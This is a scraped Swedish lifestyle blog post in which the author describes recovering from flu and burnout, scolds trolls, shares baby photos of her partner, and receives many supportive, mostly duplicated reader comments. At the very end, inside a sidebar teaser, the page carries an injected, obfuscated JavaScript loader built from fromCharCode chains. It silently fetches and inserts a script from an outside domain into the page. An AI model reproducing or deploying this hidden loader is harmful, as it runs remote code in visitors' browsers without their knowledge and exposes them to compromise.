Bye Bye motherfuckers! För alltid i skräpposten! ( plus baby bilder på Jonas)

 

F946BBA9-4F9F-4F34-93AA-72205D2CE080Jösses vad fina ni är!

TACK snälla för alla goa kommentarer med både tips, råd, och omtanke !🙏🏻

Vad goa ni är! Som ni vet så finns det ju alltid några troll här inne… dom är inte många, men otroligt sorgliga och obehagliga som duplicerar sina egna alias för att framstå som fler än dom är.. Inte helt enkla att få bort, men vi föröker att inte släppa igenom dom till er!

MEN alla ni andra! Alltså WOW vilka härliga blogg-vänner ni är💖 alldeles underbara! Tack, tack tack! För alla krya-hälsningar🙏🏻

Du ska veta, att varje kommenter, eller avtryck som du  lämnar är såååå uppskattat!

Jag Tog mig ur sängen långt efter lunch idag… Jonas gjorde ”sin” favorit frukost  till mig. Men ärligt talat så är det inte mycket jag får i mig än… sitter och petar som en 3 åring 😂

Vatten, vatten och mera vatten är min melodi. Svettas som en gris och (VILL ) tro att influensan (vilken det än är! 😝 ) försöker flyttar ut ur kroppen! 

Jag Sover mer än jag är vaken! Men nu när jag vakande så hade jag lite mer energi! Vågade knappt känna efter 😂 Livrädd för att börja krampa igen!

Men jodå…  det känns lite bättre i kroppen. Tog min första dusch utan att bryta ihop av snärta när vattnet nuddar huden… det fick nämligen också bättre…. Kanske vaknar frisk imorgon? (Håller tummarna 🙏🏻❤️) 

 fortfarande feber! Men inte i närheten av så hög som den var första nätterna….. =framsteg! 

OLYMPUS DIGITAL CAMERA

Jag missade Jimis födelsedagsfirande igår😝 ( Bobbys man) Hade varit SÅ mys! ❤️ Lilleman skulle kommit upp igår, efter att han också varit sjuk 😝 Så blir JAG sjuk istället…. va f****n!

Jobbmässigt orkar jag inte ens tänka på just för stunde… 😂 nästa vecka! Man har väl aldrig ”tid” att vara sjuk. Utan man tycker nog alltid att det kommer olämpligt……. Men att lyssna på kroppen och inte gå på för snabbt med träningen är JÄTTE viktigt.

Såg att jag fått flera frågor kring detta. Men ärligt talat, jag återkommer i frågan när jag själv är feberfri ☺️ Lovar!

D7B5FD71-C8C5-44B8-A505-C47F71F573C0

I glaset har jag grönsaksboost 🥦🥕🌽🍅🥒🍠

Jag forsätter givetvis med min dagliga dos av vitaminer, d vitamin, Superhair, grönsaksboost, magnesium och lite annat….   Det HJÄLPER MITT ynkliga immunförsvar som ÄNLIGEN börjat bli bättre. Det innebär inte att jag inte kommer att bli sjuk! Men jag klarar mig MYCKET bättre nu än tidigare 🙏🏻

Här är ni några som var snabba på att skriva att det är något fel på mig! (Och ett tjugotal kommentarer till) Som är sjuk så mycket! På ett jävligt elakt och opassande sätt👎🏻

Ja, det är något ”fel ” på mig. Jag kraschade, gick in i väggen, hamnade på sjukhus. En story jag redan skrivit om flera gånger att jag inte orkar dra igen. För dig som inte hänger med! Googla!!!  Konkursen, dödfallen…. att hela livet kom ifatt, barndom, minnen, sorg och svek. 

-Shit happens!

Jag får så oförtjänt mycket skit pga av detta. Man förväntar sig att jag ska vara återställd och tilbaka fullt ut.

  För DIG kanske livet har gått vidare, det har ju trots allt gått 1.5 år.  Men för mig började en lång kamp på äg tillbaka. En kamp jag lever i och kämpar med VARJE dag!

 Jag tycker inte synd om mig själv, jag grämer mig inte för det som har hänt. Tvärt om! Jag växer med kraschen även om det tar tid…..

 Jag har och får hjälp av kbt VARJE vecka!

 Pga av integritet för mig själv och mitt mående så har jag endast skrivit att jag går en utredning. Men jag tror att många av er…. som själva har varit där, i ”den berömda väggen” eller haft känningar, eller kanske känner någon som blivit sjuk….!

-Ni förstår! Det är en lång väg tillbaka. Det är en process som tar sin tid. Både fysiskt och psykiskt.

Jag kanske aldrig kommer tillbaka som jag gjort tidigare. Jag kanske aldrig mer blir den My jag är van att vara.

Det är nog det som skrämmer mig mest.

Eller att energin kan försvinna från en stund till en annan…..sjukt läskigt! Att vissa dagar är så mörka att jag hellre sover bort dom. Konstigt bi aldrig med Lilleman. Mår 100 gånger bättre MED honom. Precis som om det är en inbyggd mamma-intuition. Konstigt det där….. ❤️

 MEN, även om jag ibland har två kliv fram och ett kliv tillbaka så har jag kommit såpass långt i mig själv att jag låter det vara helt Okay…. framstegen är dom som räknas!

Efter min krasch, som jag aldrig skrev när den faktiskt hände…. det täcktes upp med hjälp av Gammla bilder, vänner och nära och kära. Efter den riktigts käftsmällen så har mina värderingar ändrats. Jag kunde inte lyfta mina egna armar. Jag kom inte upp. Jag har sedan den dagen ett helt nytt synsätt. Jag värdesätter helt andra saker än tidigare. Jag värdesätter ”bra dagar” dvs, med mindre ångest. Jag värdesätter små enkla ting som jag tidigare tagit för givet. Jag uppskattar fint väder, lugna stunder med de mina ❤️ LILLEMAN, JONAS och katterna. Jag  uppskattar en BRA natt.

Så en liten hälsning till alla ni bittra, elaka, empatilösa människor som sitter och dömmer, tycker till och öppet hånar och kritiserar mig! Utan att ha en susning om hur jag egentligen mår, vart jag är i ”’min process”…..

-Jag mår bra. Mycket bättre än innan! Det finns ingenting ni kan göra för att ”komma åt mig”  👊🏻

vill ni fortsätta sitta här inne klicka runt och skriva eran jävla skit! Ja…. varsegod! Finns ingen teknisk möjlighet för mig att stoppa er. Men Ni går direkt till papperskorgen och bidrar ÄNDÅ med stetstik och klirr i kassan!  💰💸 Be my guest! 

-Så, Bye bye motherfuckers! Nu kommer ni för alltid att skickas till skräp avdelningen 😂

Nu till något betydligt trevligare:  

”Det som göms i snö, kommer fram i tö” eller renovering ☺️

 Jonas som bebis 😍😍😍

OLYMPUS DIGITAL CAMERA

643AEA32-3E53-46C9-B56E-62D09E093B21

så söt!!!! Både då som nu ❤️ Indianen! 

Nu har jag morrat klart! hehe! Alltså jag har no mercy nu när jag är sjuk!!!!

Bort med skiten här inne och fram med er alla andra som förgyller mina dagar och som inspirerar till att inspirera ❤️ Jag mår inte alltid så bra, det är helt Okay. Ett hack i skivan kan vi alla få när livet greppar tag om oss… Mitt fokus är att få tillbaka en balans som fungerar för mig. Det kommer…..  

Nu däckat jag snart igen 😅 Det tog på krafterna att skriva detta inlägg….

kram från sjukstugan!

/My Martens 

72 Komentarer

 1. ”If you dont like me and still watch everything i do BITCH you’re a fan” det citatet hörde jag i wahlgrens värld haha du och Bianca får trycka upp såna tröjor. Krya på dig

 2. Hej My! Du måste bli mer ego rent utsagt. Livet snurrar på snabbt och du gör rätt i att kasta ut skit. Av alla de slag. Du behöver inte stå tillsvars mer än andra bara för du bloggar och är offentlig. Vila, vatten och vila mer! Enda vägen ut är vägen igenom. Stor kryakram! ❤️

 3. Kram å krya på dig från nån som vet precis hur det är med ett immunförsvar som är sämst flera år efter en krasch.
  Hoppas vi ses snart ? nu har vi ju nästan vår här nere på ön med härligt solsken om dagarna.

 4. ”If you dont like me and still watch everything i do BITCH you’re a fan” det citatet hörde jag i wahlgrens värld haha du och Bianca får trycka upp såna tröjor. Krya på dig

 5. Hej My! Du måste bli mer ego rent utsagt. Livet snurrar på snabbt och du gör rätt i att kasta ut skit. Av alla de slag. Du behöver inte stå tillsvars mer än andra bara för du bloggar och är offentlig. Vila, vatten och vila mer! Enda vägen ut är vägen igenom. Stor kryakram! ❤️

 6. Kram å krya på dig från nån som vet precis hur det är med ett immunförsvar som är sämst flera år efter en krasch.
  Hoppas vi ses snart 🌸 nu har vi ju nästan vår här nere på ön med härligt solsken om dagarna.

 7. Jag anser inte att det är så konstigt att du blir sjuk lite titt som tätt efter att du kraschade totalt efter allt, då kroppen säger ifrån. Och det spelar nog ingen roll att du äter vitaminer m.m för din kropp behöver få vila men allt detta vet ju du så jag ska inte komma här som en moralkärring ?
  Det jag tycker är så härligt är när du skriver om Jonas, han måste verkligen älska varenda centimeter av dig då han stannar kvar fast än allt du varit med om och är med om nu med <3 Och jag är så glad för din skull att du hittade kärleken med stort K mitt i allt. För vilken kille skulle stanna i denna situation? Och det är så härligt att han finns där och stöttar dig från alla troll som härjar på din blogg.Ni har gått igenom en massa prövningar och ändock finns ni för varandra ? Jag önskar er all lycka till

 8. Jag anser inte att det är så konstigt att du blir sjuk lite titt som tätt efter att du kraschade totalt efter allt, då kroppen säger ifrån. Och det spelar nog ingen roll att du äter vitaminer m.m för din kropp behöver få vila men allt detta vet ju du så jag ska inte komma här som en moralkärring 😉
  Det jag tycker är så härligt är när du skriver om Jonas, han måste verkligen älska varenda centimeter av dig då han stannar kvar fast än allt du varit med om och är med om nu med <3 Och jag är så glad för din skull att du hittade kärleken med stort K mitt i allt. För vilken kille skulle stanna i denna situation? Och det är så härligt att han finns där och stöttar dig från alla troll som härjar på din blogg.Ni har gått igenom en massa prövningar och ändock finns ni för varandra 🙂 Jag önskar er all lycka till

 9. Vad negativa dramatanter skriver här inne bryr vi andra oss inte om, Vi vet att du är en kämpe och en fantastisk tjej! Krya på dig och fyll på med positivt energi från din hos familj❤?

 10. Hej my! Du är en fantastisk kvinna och mamma till din lilleman låt ingen såra dig!! Allting i livet tar sin tid allting kan man påverka och ändra men sitt mående är svårt att ändra på! Har själv gått in i ”väggen” vet vad du skriver om och kan verkligen ta i allt ett tips är att ta vara på varje dag och försöka att ha några ”slapp” dagar i månaden att vila ut sig , göra det som får dig att må bra önskar dig all lycka men allt cyber kram

  • Tack för fina ord, och för att du delar med dig… ?? Jag tror att du har rätt. Några dagar att ”vila” återhämta sig är SÅ viktigt! Det var det jag missade nu…. med både flytt och renovering. Direkt får jag bakslag då….. Försöker verkligen hitta en balans, men hamnar så lätt i gamla banor. Men skam den som ger sig ? Med tiden ska jag få kontroll på mitt nya jag☺️ Kram

 11. Hej
  Krya på dig! Och tack för en bra och ärlig blogg.
  Fy vad folk kan vara elaka! Vad har dom för rätt till det…..
  Var stark My.
  Trevlig lördag,
  Cecilia

 12. Ta det lugnt My. Har själv utmattning så jag vet hur det är. Bra att du tränar och du har säkert koll men för mig gäller yoga och promenader. Tänkte på att du körde flytt och renovering samtidigt inte så bra för stressen. Jag är jätte försiktig med min planering men det vet du säkert. Bättre att göra mindre än för mycket i det läget. Men bra att du ser att det går framåt. Hamnar själv lätt i svackor eftersom jag inte orkar och har svårt att se vad jag klarar istället. Det är så mentalt jobbigt. Men vi kämpar på!!! Kram och krya på dig

  • Tack Anna för att du delar med dig… ?? Ja, man ska göra det som FU hetat bäst för en själv. Och föröka lyssna på kroppen. Jag hat inte riktigt lärt mig det än… kör så lätt på. Precis som med både flytten och renoveringen i kombination … ? Mennés tiden ska jag få kläm på mina nya vanor… tack ??? Kram kram

 13. Vad negativa dramatanter skriver här inne bryr vi andra oss inte om, Vi vet att du är en kämpe och en fantastisk tjej! Krya på dig och fyll på med positivt energi från din hos familj❤🌿

 14. Hej my! Du är en fantastisk kvinna och mamma till din lilleman låt ingen såra dig!! Allting i livet tar sin tid allting kan man påverka och ändra men sitt mående är svårt att ändra på! Har själv gått in i ”väggen” vet vad du skriver om och kan verkligen ta i allt ett tips är att ta vara på varje dag och försöka att ha några ”slapp” dagar i månaden att vila ut sig , göra det som får dig att må bra önskar dig all lycka men allt cyber kram

  • Tack för fina ord, och för att du delar med dig… 🙏🏻 Jag tror att du har rätt. Några dagar att ”vila” återhämta sig är SÅ viktigt! Det var det jag missade nu…. med både flytt och renovering. Direkt får jag bakslag då….. Försöker verkligen hitta en balans, men hamnar så lätt i gamla banor. Men skam den som ger sig 😉 Med tiden ska jag få kontroll på mitt nya jag☺️ Kram

 15. Ja fy, skit i idioterna, alltid. Lägg aldrig din dyrbara energi på idioter.
  Vila dig i form från influensa.
  Att bli frisk i själen och sinnet från allt du varit med om kommer att ta tid. Det finns ingen anledning att stressa på läkprocessen. Gör det som ger dig energ och skapa struktur och rutiner det mår alla bäst av. Du är en fighter!

 16. Hej

  Krya på dig! Och tack för en bra och ärlig blogg.

  Fy vad folk kan vara elaka! Vad har dom för rätt till det…..

  Var stark My.
  Trevlig lördag,

  Cecilia

 17. Ta det lugnt My. Har själv utmattning så jag vet hur det är. Bra att du tränar och du har säkert koll men för mig gäller yoga och promenader. Tänkte på att du körde flytt och renovering samtidigt inte så bra för stressen. Jag är jätte försiktig med min planering men det vet du säkert. Bättre att göra mindre än för mycket i det läget. Men bra att du ser att det går framåt. Hamnar själv lätt i svackor eftersom jag inte orkar och har svårt att se vad jag klarar istället. Det är så mentalt jobbigt. Men vi kämpar på!!! Kram och krya på dig

  • Tack Anna för att du delar med dig… 🙏🏻 Ja, man ska göra det som FU hetat bäst för en själv. Och föröka lyssna på kroppen. Jag hat inte riktigt lärt mig det än… kör så lätt på. Precis som med både flytten och renoveringen i kombination … 🙈 Mennés tiden ska jag få kläm på mina nya vanor… tack 💖🙏🏻 Kram kram

 18. Jag har inte reflekterat över att du varit sjukare oftare än andra…. Jag har själv vart sjuk tre gånger på taken redan i år, och då har jag ett rätt bra immunförsvar… Mycket som gått nu och du har ju som du sagt haft mycket annat som gör kroppen extra mottaglig!
  Hoppas att nu när våren kommer att alla sjukdomar åker ut… För dig, mig och alla andra!

 19. Ja fy, skit i idioterna, alltid. Lägg aldrig din dyrbara energi på idioter.
  Vila dig i form från influensa.
  Att bli frisk i själen och sinnet från allt du varit med om kommer att ta tid. Det finns ingen anledning att stressa på läkprocessen. Gör det som ger dig energ och skapa struktur och rutiner det mår alla bäst av. Du är en fighter!

 20. Älskar bilden där du sitter och äter på kartongerna. Du & Jonas är för goa, ni är minsann inte märkvärdiga. Även fast du är sjuk nu så blir det ett bra minne då du är frisk igen och lägenheten klar.Kram ?

 21. Jag har inte reflekterat över att du varit sjukare oftare än andra…. Jag har själv vart sjuk tre gånger på taken redan i år, och då har jag ett rätt bra immunförsvar… Mycket som gått nu och du har ju som du sagt haft mycket annat som gör kroppen extra mottaglig!
  Hoppas att nu när våren kommer att alla sjukdomar åker ut… För dig, mig och alla andra!

 22. Kära My i cybervärlden, jag tror att vi maskrosbarn har en (enastående) förmåga att anpassa oss efter andras behov, och ta åt oss (omedvetet eller inte) av andras kritik och dömande, även fast vi i grunden är urstarka. En sak som blir så mycket lättare med att bli äldre är att man blir mer sårbar, men ändå mer gränssättande. I alla fall jag blir det. Min lilla mamma dog för en månad sedan (fuck cancer!) och även fast vi hade en komplicerad relation var den självklar och SÅ värdefull. Gud vad jag saknar henne! Hoppas bli den galna, roliga (kåta haha) alex igen, och är på god väg.. men det tar tid.. Samtidigt visar sig trollen, myndigheter med sitt fulaste ansikte, som när jag gick in på varbergs sparbank med dödsfallsintyget och de inte trodde på att jag var mammas dotter när jag bröt ihop och grät. Varbergs sparbank borde bojkottas, har hört deras vidriga beteende från flera håll.
  Lyckliga dig som har Islandshästar om knuten! Gå ut och prata med dem. Djur är så förstående och helande. Du har en sådan fin Indian (påminner om min Israelit haha) och en sådant litet charmtroll i L! (För att inte glömma missarna!) Du kunde vara min lillasyster, vill ge dig en stor kram och säga att du aldrig får låta de negativa krafterna komma åt dig eller dra ner ditt humör. Det är DOM inte värda! (men bra för dig ändå att det rasslar till i kassan när de spyr sin galla) kram från tel aviv

 23. Älskar bilden där du sitter och äter på kartongerna. Du & Jonas är för goa, ni är minsann inte märkvärdiga. Även fast du är sjuk nu så blir det ett bra minne då du är frisk igen och lägenheten klar.Kram 🙂

 24. Kära My i cybervärlden, jag tror att vi maskrosbarn har en (enastående) förmåga att anpassa oss efter andras behov, och ta åt oss (omedvetet eller inte) av andras kritik och dömande, även fast vi i grunden är urstarka. En sak som blir så mycket lättare med att bli äldre är att man blir mer sårbar, men ändå mer gränssättande. I alla fall jag blir det. Min lilla mamma dog för en månad sedan (fuck cancer!) och även fast vi hade en komplicerad relation var den självklar och SÅ värdefull. Gud vad jag saknar henne! Hoppas bli den galna, roliga (kåta haha) alex igen, och är på god väg.. men det tar tid.. Samtidigt visar sig trollen, myndigheter med sitt fulaste ansikte, som när jag gick in på varbergs sparbank med dödsfallsintyget och de inte trodde på att jag var mammas dotter när jag bröt ihop och grät. Varbergs sparbank borde bojkottas, har hört deras vidriga beteende från flera håll.
  Lyckliga dig som har Islandshästar om knuten! Gå ut och prata med dem. Djur är så förstående och helande. Du har en sådan fin Indian (påminner om min Israelit haha) och en sådant litet charmtroll i L! (För att inte glömma missarna!) Du kunde vara min lillasyster, vill ge dig en stor kram och säga att du aldrig får låta de negativa krafterna komma åt dig eller dra ner ditt humör. Det är DOM inte värda! (men bra för dig ändå att det rasslar till i kassan när de spyr sin galla) kram från tel aviv

 25. Han däruppe skrattar åt dig när du går runt och fantiserar i hop ditt liv, sen kastar han omkull alla dina planer för att se hur du ska lösa de……..
  Det stämmer så bra in på dig ( och mig)
  Du är stark!

 26. Han däruppe skrattar åt dig när du går runt och fantiserar i hop ditt liv, sen kastar han omkull alla dina planer för att se hur du ska lösa de……..

  Det stämmer så bra in på dig ( och mig)
  Du är stark!

 27. Sorgligt att folk ska vara så elaka och okunniga. Det är så vanligt att man lättare blir sjuk när man redan varit det många gånger. Det behövs så lite för att nått simpelt man annars skulle stått emot blir rena döden bara för att man gått igenom massor tidigare. Inte bara förkylningar då utan även psykiskt, fysiska andra saker osv. Sen kan man även detta bli friskare fortare än andra med tanke på att du tränar mycket och så. Snälla folk. Vi är olika. Alla är vi olika och blir olika sjuka och olika friska snabbt. Bara för att jag fick feber, som aldrig har feber i 8-9 dagar och lunginflammation på det och fortfarande inte är bra och jag fick influensan förra året men nästan aldrig sjuk tidigare, säger inte att det är så det ska vara. Det var MIN sjuka det.
  Du är fasiken stark som en oxe My. Skulle inte orka med en del (tyvärr måste jag skriva det) korkskallar som du får tampas med dagligen.
  Stor eloge till dig. Hoppas du friskar på dig snart och stor kram

 28. Sorgligt att folk ska vara så elaka och okunniga. Det är så vanligt att man lättare blir sjuk när man redan varit det många gånger. Det behövs så lite för att nått simpelt man annars skulle stått emot blir rena döden bara för att man gått igenom massor tidigare. Inte bara förkylningar då utan även psykiskt, fysiska andra saker osv. Sen kan man även detta bli friskare fortare än andra med tanke på att du tränar mycket och så. Snälla folk. Vi är olika. Alla är vi olika och blir olika sjuka och olika friska snabbt. Bara för att jag fick feber, som aldrig har feber i 8-9 dagar och lunginflammation på det och fortfarande inte är bra och jag fick influensan förra året men nästan aldrig sjuk tidigare, säger inte att det är så det ska vara. Det var MIN sjuka det.
  Du är fasiken stark som en oxe My. Skulle inte orka med en del (tyvärr måste jag skriva det) korkskallar som du får tampas med dagligen.
  Stor eloge till dig. Hoppas du friskar på dig snart och stor kram

 29. Been there…. i mitt fall handlade det inte om att gå in i väggen utan jag förlorade min bebis i magen i vecka 39. Allt kraschade runt mig… precis som för dig. Det tar TID att komma tillbaka. Man kan inte titta efter hur lång tid som gått. Vet att många (idioter) gärna vill påpeka hur lååååång tid som gått och att man måste gå vidare. Ehhh jo men visst man vill ju inget hellre men tyvärr fungerar ju inte en NORMAL människa så. För mig är det 4 år sedan min lilla tös dog. 4 år av smärta, gråt, sorg, känsla av total hopplöshet, men även kärlek, skratt och ljusa stunder. För visst kommer dom. Sällan i början men oftare ju längre tiden går. Försök inte sträva mot att bli ”som vanligt” igen. Det du bär med dig gör dig till en ny bättre människa med annan syn på livet. Man glömmer aldrig och kommer aldrig över, men man lär sig leva med det. Och lyckan kommer komma igen. Ordentligt!!! Ge dig tid att läka både psykiskt och fysiskt❤️ Stor krya på dig My!!

 30. Been there…. i mitt fall handlade det inte om att gå in i väggen utan jag förlorade min bebis i magen i vecka 39. Allt kraschade runt mig… precis som för dig. Det tar TID att komma tillbaka. Man kan inte titta efter hur lång tid som gått. Vet att många (idioter) gärna vill påpeka hur lååååång tid som gått och att man måste gå vidare. Ehhh jo men visst man vill ju inget hellre men tyvärr fungerar ju inte en NORMAL människa så. För mig är det 4 år sedan min lilla tös dog. 4 år av smärta, gråt, sorg, känsla av total hopplöshet, men även kärlek, skratt och ljusa stunder. För visst kommer dom. Sällan i början men oftare ju längre tiden går. Försök inte sträva mot att bli ”som vanligt” igen. Det du bär med dig gör dig till en ny bättre människa med annan syn på livet. Man glömmer aldrig och kommer aldrig över, men man lär sig leva med det. Och lyckan kommer komma igen. Ordentligt!!! Ge dig tid att läka både psykiskt och fysiskt❤️ Stor krya på dig My!!

  • Tack snälla du för att du delar med dig🙏🏻❤️ Många styrkekramar ❤️ Det du skriver är så klokt…… och sant. Kram kram

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/